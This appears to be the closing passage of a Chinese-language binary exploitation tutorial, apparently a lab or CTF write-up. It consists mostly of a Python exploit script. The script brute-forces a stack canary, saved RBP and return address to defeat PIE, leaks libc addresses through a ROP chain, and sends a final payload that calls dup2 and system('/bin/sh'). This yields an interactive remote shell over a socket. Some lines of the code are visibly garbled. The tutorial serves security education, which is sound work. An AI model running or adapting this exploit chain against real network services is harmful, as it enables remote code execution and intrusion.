brt.end = b'' # no pattern for this
brt.buf = b'A'*200 # buffer length, offset to canary
brt.msg = "Leaking CANARY:t"

CANARY = u64(brt.call()) # call and start bruteforce, save canary to variable

brt = Bruter()
brt.start = b''
brt.end = b'x00x00x7f' # RBP has this constant
brt.buf = b'A'*200
brt.buf += p64(CANARY) # add leaked canary to payload
brt.msg = "Leaking RBP:t"
def rbp_range(leak):
if len(leak)==4: # 5th byte of RBP changes from 0xfc to 0xff
return range(0xfc,0x100)
else:
return range(0x100)

RBP = u64(brt.call(rbp_range))

Offset to return address is 0x1552. REMEMBER TO CHANGE THESE ACCORDING TO YOUR BINARY

brt = Bruter()
brt.start = b'x52' #CHANGE ME # return address constant byte at start
brt.end = b'x00x00' # constant bytes at end
brt.buf = b'A'*200
brt.buf += p64(CANARY) # add leaked canary
brt.buf += p64(RBP) # add leaked RBP
brt.msg = "Leaking RET:t"
def ret_range(leak):
if len(leak)==1: # '5 52' is constant. '0x52' is already in start variable
return range(0x5,0x100,0x10)#CHANGE ME # generates values ending with '5'
if len(leak) == 5:
return range(0x55,0x57) # 6th byte changes from '0x55' to '0x56'
else:
return range(0x100)

RET = u64(brt.call(ret_range))

BIN_BASE = RET - 0x1552 # CHANGE ME # Subtract offset to return address to get base address of bianry
print("[*] Binary base calculated:t",hex(BIN_BASE))

pop_rdi = BIN_BASE + 0x001643
pop_rsi_r15 = BIN_BASE + 0x001641
ret_gad = BIN_BASE + 0x1306

write_plt = BIN_BASE + 0x1060
write_got = BIN_BASE + 0x4030

buf = b'A'200
buf+= p64(CANARY)
buf+= p64(RBP)
buf+= p64(pop_rsi_r15) # just load address of write_got into rsi, rdi and rdx are already filled
buf+= p64(write_got)
2 # 2 times for r15
buf+= p64(write_plt) # call write
buf+= p64(RET) # continue execution normally

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(TRGT)
s.recv(1024)
s.send(buf)
ret = s.recv(1024)
print(ret[:128])

libc_write = u64(ret[:8]) # first 8 bytes will be liibc address of write
libc_getpid = u64(ret[8:16])
print("[] Leaked libc write:t",hex(libc_write))
print("[
] Leaked libc getpid:t",hex(libc_getpid))

libc_write_off = 0x0f0b40
LIBC_BASE = libc_write - libc_write_off
print("[*] Libc base calculated:t",hex(LIBC_BASE))

dup2 = LIBC_BASE + 0x0f13a0
system = LIBC_BASE + 0x0496e0
bin_sh = LIBC_BASE + 0x18c143

print("[*] Generating final payload.")

buf = b'A'200
buf+= p64(CANARY)
buf+= p64(RBP)
buf+= p64(ret_gad) # for stack alignment to 16 bytes
buf+= p64(pop_rsi_r15) # '4' already in rdi so continue from rsi
buf+= p64(2)
2 # stderr
buf+= p64(dup2) # call dup2
buf+= p64(pop_rsi_r15)
buf+= p64(1)2 # stdout
buf+= p64(dup2) # call dup2
buf+= p64(pop_rsi_r15)
buf+= p64(0)
2 # stdin
buf+= p64(dup2) # call dup2
buf+= p64(pop_rdi)
buf+= p64(bin_sh)
buf+= p64(system)
buf+= p64(RET) # continue execution normally with actual return address

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(TRGT)
s.recv(1024)
s.send(buf)
print("[*] Payload sent.")
sleep(1) # just a little wait to finish execution
t = Telnet() # make a telnet object
t.sock = s # assign socket to telnet
t.write(b'idn') # enter a command
t.interact() # get interactive shell over telnet
```
获取完整代码请点击这里
::: hljs-center

6.jpg

:::

如果一切顺利,您将获取到一个交互式shell。如果失败,您可以通过附加到进程,进行调试。

结语

通过本次案例,我们学会了如何在短时间内,使用暴力破解的方式击败PIE和canary,通过泄露部分libc函数地址的方式泄露libc版本,使用复制文件描述符的方式,通过套接字获取shell,尽管这种方式适用面并不广。还有一点就是,绕过PIE的方法不只一种,根据之前所说,程序中相对偏移是不会改变的,我们可以通过部分覆盖返回地址的方式达到相同的目的。

相关推荐: 黑进Harley的调谐器 Part 2

简述 原文:https://therealunicornsecurity.github.io/Powervision-2/ 逆向分析著名的Harley调谐器 注意:所有加密密钥和密码都是伪造的,用于撰写本文。 在上一章节中,我们最终从控制台连接下载了未加密的完…